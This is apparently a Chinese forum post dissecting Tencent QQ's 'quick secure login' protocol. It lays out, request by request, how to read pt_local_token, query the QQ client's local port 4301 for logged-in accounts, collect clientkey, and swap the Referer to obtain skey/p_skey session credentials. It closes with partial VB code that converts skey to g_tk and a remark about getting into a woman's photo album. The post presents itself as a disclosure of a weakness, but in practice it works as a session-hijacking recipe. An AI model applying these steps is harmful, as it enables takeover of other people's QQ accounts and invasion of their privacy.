极其危险的QQ快速安全登陆协议分析

伊索谗言

虽说快速登陆名称叫做QQ安全登陆，但是其实并不安全。

记得以前吾友曾经发布的一个相似的主题：https://www.52pojie.cn/thread-591949-1-1.html。2017-3-21日发布的。一年多了，都快两年了，可能已更新，再重新分析一下。


本次以QQ恢复快速登陆为例子。


浏览器F12，勾选Preserve log。这样遇到302页面跳转就不会出现得不到COOKIE的情况了。


一、抓包



第一次请求[GET]：https://xui.ptlogin2.qq.com/cgi-bin/xlogin?s_url=https%3A%2F%2Fhuifu.qq.com%2Findex.html&style=20&appid=715021417&proxy_url=https%3A%2F%2Fhuifu.qq.com%2Fproxy.html

请求头无需要任何带入操作，请求cookie。

返回头出现一堆set-cookie，其他的没有什么用，但必须有一个关键cookie：“pt_local_token”，必须记录下来。



第二次请求 [GET]：https://localhost.ptlogin2.qq.com:4301/pt_get_uins?callback=ptui_getuins_CB&r=0.6694805047494219&pt_local_tk=-1806654417

标红的为第一个包路径得到了pt_local_token。

请求头带入Referer，Cookie带入pt_local_token=“pt_local_token”

返回当前本机所登陆的QQ号码。

var var_sso_uin_list=[{"account":"Q号","client_type":65793,"face_index":144,"gender":1,"nickname":"Blue","uin":"QQ号","uin_flag":4194822}];ptui_getuins_CB(var_sso_uin_list);

在这里再说一下4301端口，这个是QQ.exe所开放的本地服务器端口。但是这个4301并不固定。



可以看到127.0.0.1已经开放了4301端口。



PID为3436所占用的此端口。

调出任务管理器，查看-选择列，勾选PID。



真相大白。
第三次请求[GET]：https://localhost.ptlogin2.qq.com:4301/pt_get_st?clientuin=QQ号&callback=ptui_getst_CB&r=0.7284667321181328&pt_local_tk=-1806654417

标红的为第二个包所得到的QQ号码，以及第一次得到的pt_local_token

请求头带入Referer，Cookie带入pt_local_token=“pt_local_token”

恩，返回头有set-cookie。记录下来。


第四次请求[Get]:https://ssl.ptlogin2.qq.com/jump?clientuin=clientuin&keyindex=9&pt_aid=715021417&u1=https%3A%2F%2Fhuifu.qq.com%2Findex.html&pt_local_tk=1096080737&pt_3rd_aid=0&ptopt=1&style=40

clientuin和pt_local_tk第三次请求，和第一次请求都有。

请求头带入referer和cookie。

cookie需要带入pt_local_token、clientuin、clientkey等关键参数。

提交返回头如下：



关键参数说明有了这两个参数，可以进行一些敏感操作了。

不过，有些网站还需要另外两个参数。p_skey参数，以及g_tk参数。

但是如何获得p_skey呢？如QQ恢复网站的快速登陆根本就没有返回消息。更换referer可以实现第四个包出现返回消息。

以我QQ空间为例：

返回：ptui_qlogin_CB('0', 'https://ptlogin2.qzone.qq.com/check_sig?pttype=2&uin=QQ号&service=jump&nodirect=0&ptsigx=06bbcd374ab3c5df7d26d1493f9a6364895db2999b5cb25a3fcf208213a7211c3848716312355f3cb98c44626c6f3fda428d7e4e09f196e1ace0c26f3acd7620&s_url=https%3A%2F%2Fqzs.qzone.qq.com%2Fqzone%2Fv5%2Floginsucc.html%3Fpara%3Dizone%26specifyurl%3Dhttp%253A%252F%252Fuser.qzone.qq.com%252FQ号&f_url=&ptlang=2052&ptredirect=100&aid=1000101&daid=5&j_later=0&low_login_hour=0®master=0&pt_login_type=2&pt_aid=549000912&pt_aaid=0&pt_light=0&pt_3rd_aid=0', '')


第五次请求：https://ptlogin2.qzone.qq.com/check_sig?pttype=2&uin=QQ号&service=jump&nodirect=0&ptsigx=06bbcd374ab3c5df7d26d1493f9a6364895db2999b5cb25a3fcf208213a7211c3848716312355f3cb98c44626c6f3fda428d7e4e09f196e1ace0c26f3acd7620&s_url=https%3A%2F%2Fqzs.qzone.qq.com%2Fqzone%2Fv5%2Floginsucc.html%3Fpara%3Dizone%26specifyurl%3Dhttp%253A%252F%252Fuser.qzone.qq.com%252FQ号&f_url=&ptlang=2052&ptredirect=100&aid=1000101&daid=5&j_later=0&low_login_hour=0®master=0&pt_login_type=2&pt_aid=549000912&pt_aaid=0&pt_light=0&pt_3rd_aid=0

地址为第四个包返回的地址，

请求头带入referer和cookie。

cookie中带入pt_local_token。

请求之后302页面返回头。

恩，set-cookie



协议结束，各种参数均已得到。这就完成了一次QQ快速登陆的操作。

基本QQ的发包操作，有一些cookie是少不了的，skey、p_skey、这两个参数非常重要，地位相当于密码，没有这两个参数，什么都做不了。

咱们明白了协议操作方式，那么程序完全可以实现这一点。


那么想知道妹子的相册密码怎么办？




相册密码我已经进行了AES加密，因为GET提交方式对+号会出现错误，如果有这个符号的话会提交失败。

写的这个程序只是为了显示QQ快速登陆的危害，也不会放出此软件。

最后再附送一个skey转换g_tk的Vb源码：

[Visual Basic] 纯文本查看 复制代码Public Function 计算g_tk(ByVal Skey$)Dim obj As ObjectDim code As StringDim g_tk As Stringcode = &quot;function getGTK(str){var hash = 5381;for(var i = 0, len = str.length; i < len; ++i){hash += (hash